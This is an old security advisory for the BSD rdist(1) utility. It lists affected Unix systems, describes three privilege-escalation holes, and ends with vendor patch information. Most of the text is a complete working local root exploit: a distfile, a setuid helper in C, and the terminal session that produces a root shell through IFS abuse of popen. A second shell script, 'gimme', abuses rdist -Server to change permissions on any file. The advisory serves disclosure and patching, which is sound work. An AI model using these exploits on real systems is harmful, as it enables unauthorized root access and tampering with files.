COMMAND rdist(1) SYSTEMS AFFECTED SunOS 4.1.2 or earlier (Patch-ID# 100383-06 fixes this) AIX 3.2.x A/UX 2.0.1 SCO 3.2v4.2 BSD NET/2 Derived Systems UNICOS 6.0/6.E/6.1 NeXTstep Release 2.x IRIX 3.3/4.0 (fixed in 4.0) most systems supporting BSD rdist. OS that are safe: Ultrix 4.3 OSF/1 1.3 HP-UX Solaris 2 PROBLEM There are at least 3 security holes in rdist. The first hole is that rdist does a chown()/chmod on file name as root instead of fchmod or fchown. The second one blows a bugger (4 times each time one byte shorter). In doing so it overwrites the global variable "userid" that just happens to be next to it. The trailing 0 from the 4 iterations zeros the userid variable. The third uses popen(3) to execute sendmail(8) as root. It can therefore be made to execute arbitrary programs as root by use of the IFS variable. This example demonstrates how to become root on most affected machines by creating a set-uid root shell by exploiting the popen(3) call. Create the following file 'distfile': --------------------------- cut here ---------------------------- HOSTS = localhost FILES = BullInTheHeather ${FILES} -> ${HOSTS} install /tmp/1 ; notify user ; --------------------------- cut here ---------------------------- Create the following file 'usr.c': --------------------------- cut here ---------------------------- main() { setuid(0); chown("sh" 0 0); chmod("sh" 04755); exit(0); } --------------------------- cut here ---------------------------- (Lines marked with > represent user input) > % cp /bin/sh . > % cc -o usr usr.c > % set path=(. $path) > % setenv IFS / > % rdist updating host localhost rdist: BullInTheHeather: No such file or directory notify @localhost ( user ) > % ls -l -rwsr-xr-x 1 root 106496 Mar 4 00:25 sh > % ./sh # --------------------------- cut here ---------------------------- #! /bin/sh # GIMME - "gimme' a file" # Demonstrate rdist's ability to give me permission to access anything. # # gimme [ []] # is the target file. # is the octal mode to which the file access permission # should be set. Note that this may not be effective unless # either the SUID (4000) or SGID (2000) bits are also requested. # is the target directory for rdist to use if a hard # link is desired. Note that the user must have permission # to create this directory it must be on the same filesystem # as the target file and the target file must not be a # directory. This option is necessary to change the ownership # of the target if chown() of a symbolic link modifies the # link itself and not the file it refers to. # dirname=gimme$$ deftemp=/tmp defperm=6777 if [ $1x = x ]; then echo "Usage: $0 [ []]" >&2 exit 1 fi if [ $2x != x ]; then perm=$2 else perm=$defperm fi if [ $3x != x ]; then link="ln" temp=$3/$dirname target=$1 else link="ln -s" temp=$deftemp/$dirname case $1 in /*) target=$1 ;; *) target=`pwd`/$1 ;; esac fi trap "rm -fr $temp; exit 1" 1 2 15 umask 66 mkdir $temp; if [ $? != 0 ]; then exit 1 fi set `whoami` $LOGNAME user=$1 set daemon `groups` while [ $# != 1 ]; do shift done group=$1 ( echo "t$temp/something" echo "R0 $perm 1 0 $user $group " while [ ! -f $temp/rdist* ]; do sleep 1 done set $temp/rdist* rm -f $1 if $link $target $1 >&2; then echo "" | dd bs=3 conv=sync 2>/dev/null echo "" echo 0 > $temp/status else echo 1 > $temp/status fi exit ) | rdist -Server status=`cat $temp/status` rm -fr $temp exit $status --------------------------- cut here ---------------------------- SOLUTION Apply your vendor's patch. Cray Research Inc. UNICOS 6.0/6.E/6.1 Field Alert #132 SPR 47600 For further information contact the Support Center at 1-800-950-CRAY or 612-683-5600 or e-mail support@crayamid.cray.com. NeXT Computer Inc. NeXTstep Release 2.x A new version of rdist may be obtained from your authorized NeXT Support Center. If you are an authorized support center please contact NeXT through your normal channels. NeXT also plans to make this new version of rdist available on the public NeXT FTP archives. Silicon Graphics IRIX 3.3.x/4.0 (fixed in 4.0.1) Patches may be obtained via anonymous ftp from sgi.com in the sgi/rdist directory. Sun Microsystems Inc. SunOS 4.0.3/4.1/4.1.1 Patch ID 100383-06 Patches may be obtained via anonymous ftp from ftp.uu.net or from local Sun Answer Centers worldwide. Both bugs can be fixed by adding one line at the beginning of the server routine: setreuid(userid userid); or setuid(userid); There is no need for rdist -Server to run as root. You can also just remove the setuid bin from rdist and/or obtain USC's version of rdist from usc.usc (pub/rdist). For Sun's the patch id number is 100383-06.